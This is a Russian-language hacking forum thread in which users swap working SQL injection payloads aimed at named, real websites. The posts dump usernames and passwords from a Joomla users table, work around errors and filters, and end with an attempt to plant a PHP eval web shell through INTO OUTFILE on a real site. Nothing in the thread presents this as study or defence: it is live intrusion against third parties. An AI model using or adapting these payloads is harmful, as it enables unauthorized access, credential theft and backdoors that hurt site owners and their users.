http://www.ticketing.ru/news.php?id=1022+order+by+100-- в данном месте интересует только раскрутка инклуда(!) расскажите что да как. Если тут это возможно
Причем тут тогда SQl inj? И вообще там просто нет подключаемого файла в директории. На запрос не как не повлияешь.
Подскажите, что надо прописать чтобы инфу вытягивать со второй строки, а не с первой. Например в этой sql: +union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,concat(username,0x3a,password,0x3a,gid,0x3a,id)Gabriel,26,+from+jos_users+limit+1,1-- спасибо.
+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24,group_concat(username,0x3a,pa ssword,0x3a,gid,0x3a,id)Gabriel,26,+from+jos_users--
MSSQL script.php?id=14'%20and%201=1-- Выдает Error : Conversion failed when converting the varchar value '14\' to data type int. (severity 16). Как бороться ?
стандартная скуль в mysql http://www.xxx.com/index.php?id=2956775+union+select+1,2,3,4,5,6,7,8,9,10/* выдает нормальную страницу юзера а вот попытки вывести принтабельные поля не проходят. все фишки типа: http://www.xxx.com/index.php?id=-2956775+union+select+1,2,3,4,5,6,7,8,9,10/* http://www.xxx.com/index.php?id=29567111175+union+select+1,2,3,4,5,6,7,8,9,10/* http://www.xxx.com/index.php?id=2956775+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10/* не дают результат, выводит только: The profile is not active! есть ли еще идеи как это обойти? админки нет, а blind'oм тянуть 2 ляма юзеров это самоубийство
budden http://www.xxx.com/index.php?id=2956775+and+1=1+union+select+1,2,3,4,5,6,7,8,9,10/* выдает профиль юзера такой же как и тут http://www.xxx.com/index.php?id=2956775 сайт серьезный, поэтому урл не публикую
Что значит выдает профиль юзера? Если значение intval, то и так будет выдавать id=2956775+antichat+ru--+, и не факт что это инжа. И что значит "and 1=1"? Параметр id и так верный, какой смысл в данной манипуляции? И последнее.. Только я не вижу вопроса?
вот ссылка http://www.soulmades.com.au/index.php?ap=2956775+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80/*
Не могу залить shell http://www.bedag.ch/news/news_d.php?id=-64+union+select+1,2,3,4,5,6,7,8,9,10,11,'<?php eval($_GET[‘e’]) ?>',13,14,15,16,17,18,19,20,21,22,23,24,25,26+INTO+OUTFILE+'E:/webroot/a99/a99a-www-www/events/shell.php'+--+